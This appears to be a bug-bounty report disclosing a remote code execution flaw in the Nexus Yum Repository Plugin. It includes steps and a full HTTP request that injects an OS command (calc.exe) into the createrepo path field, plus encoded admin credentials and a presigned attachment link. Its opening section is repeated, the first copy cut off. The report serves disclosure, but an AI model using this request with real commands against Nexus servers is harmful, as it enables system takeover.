### Maven artifact groupId: org.sonatype.nexus.plugins artifactId: nexus-yum-repository-plugin version: 2.14.9-01 ### Vulnerability #### Vulnerability Description The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data is vulnerable, such as the Yum Configuration Capability. #### Additional Details Source File and Line Number: https://github.com/sonatype/nexus-public/blob/release-2.14.9-01/plugins/yum/nexus-yum-repository-plugin/src/main/java/org/sonatype/nexus/yum/internal/capabilities/YumCapability.java#L121 #### Steps To Reproduce: Navigate to "Capabilities" in Nexus Repository Manager. Edit or create a new Yum: Configuration capability Set path of "createrepo" or "mergerepo" to an OS command (e.g. C:\Windows\System32\calc.exe) The OS command should now have executed as the SYSTEM user. Note that in this case, Nexus appends --version to the OS command. The following HTTP request was used to...
### Maven artifact groupId: org.sonatype.nexus.plugins artifactId: nexus-yum-repository-plugin version: 2.14.9-01 ### Vulnerability #### Vulnerability Description The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data is vulnerable, such as the Yum Configuration Capability. #### Additional Details Source File and Line Number: https://github.com/sonatype/nexus-public/blob/release-2.14.9-01/plugins/yum/nexus-yum-repository-plugin/src/main/java/org/sonatype/nexus/yum/internal/capabilities/YumCapability.java#L121 #### Steps To Reproduce: Navigate to "Capabilities" in Nexus Repository Manager. Edit or create a new Yum: Configuration capability Set path of "createrepo" or "mergerepo" to an OS command (e.g. C:\Windows\System32\calc.exe) The OS command should now have executed as the SYSTEM user. Note that in this case, Nexus appends --version to the OS command. The following HTTP request was used to trigger the vulnerability: PUT /nexus/service/siesta/capabilities/000013ea3743a556 HTTP/1.1 Host: HOST:PORT Accept: application/json Authorization: Basic YWRtaW46YWRtaW4xMjM= Content-Type: application/xml Content-Length: 333 Connection: close ```xml <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <ns2:capability xmlns:ns2="http://sonatype.org/xsd/nexus-capabilities-plugin/rest/1.0"><id>healthcheck</id><notes>123</notes><enabled>true</enabled><typeId>1</typeId><properties><key>createrepoPath</key><value>C:\Windows\System32\calc.exe</value></properties></ns2:capability> ``` ### Supporting Material/References: Windows Server 2016 Sonatype Nexus Repository Manager 2.14.9-01 Java 8 ### Wrap up I contacted the maintainer to let them know: N I opened an issue in the related repository: N ### Impact An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system. 1 attachment: F535957: [nexus-rce-poc.mov](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/535/957/8c5d52b0c1300eae4d244dafa79bb235d4b24759/nexus-rce-poc.mov?response-content-disposition=attachment%3B%20filename%3D%22nexus-rce-poc.mov%22%3B%20filename%2A%3DUTF-8%27%27nexus-rce-poc.mov&response-content-type=video%2Fquicktime&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQTQ7RUCNN%2F20190904%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20190904T065101Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=AgoJb3JpZ2luX2VjEG4aCXVzLXdlc3QtMiJHMEUCIQDW18lsDdxnuacK2LoIPt9SJfaM7RexbHTvXoupz%2FW8dAIgHcvKxyDk%2BPmKn6p9%2BGfi%2FyM3PfheC8jtu4UhkazcO3Uq2gMIJxAAGgwwMTM2MTkyNzQ4NDkiDGDTX5okCHBmYBVtKSq3A2LoI%2F7s7hPcIf3eF0vU2kdCV%2FWeF4CU35H%2FQ7q%2BtQF2SMMXK%2BpIl1ytFeVJBZzYl9aGHPyC724Qv70vluRcJaxGgf9URJ%2Bg9W6Gya0GbHQmOf3d7pbi7J4z9oY68yLtWC5E05tjbujNx3qiMKL7IIWThHH9U540TlxKAwEXop1F6UwdqNIu3YAqnUCJAhoLYsJf5SZqZXLvYV84N%2FqdcXW%2Fb3Q1BRckuVfn5IcDmSDIC3nAFYjpUk3EtEm2o7Rn%2FADuCOzJ0SwtzkbncFMzwHlwXImej4h85kwlvBPJ1uWGLhlaL7aa2bKQQWTcHYFXdSbUdo%2B6O5gyGRvLajCZrh1YojSS7avzNW6yptiOVvVkfCJR%2B%2BIzT7F0fX4c2rYAggt%2Fk%2BJGsbWDMrJBntZqhY88rEsBsi9wim6aOX3jw9%2FV8SXQZmK3LFIeEi1xZAHGYwHWmn%2Fe1NCrQyMJFyWGao%2FMaRmdUkS%2BKauV9nskI04XE%2B3vSuhkrqgr7PcJ55qlXluI4HJrxda8yf59EZ8rRVs6ZxAzPTefWlHt6AxdiGsh%2BvNHe5Q9pUDO4fB8ZstmVUNd6RXkFLowv6G96wU6tAFFdBv%2F32ra07mFyzETz9DX%2B5TcyYqppzU6Lnj36l9NNuMjwmTX3328bJ0XsNC194%2F7LRM%2Fm6REUX7XqbaXsFjawKbtom%2FSnOfoQEbstNfcMQEP27%2B%2BRSXbzNMeWnBm2DKJfS4DO67mFacSFT04uTxfhK0Gtbnd5Rj%2B8RAGQ18YPxITs9lNw%2BF7uzkdUcfCp4fEp3XP7d4k2wKtM5QDKXx9iyY6O5d5S%2FTCdYV9j01EJmOcsuM%3D&X-Amz-Signature=64d7aa4dc5d8a5f1c525b16ed2a3c719f85c7d56a476e623e1929c2968dee35e)
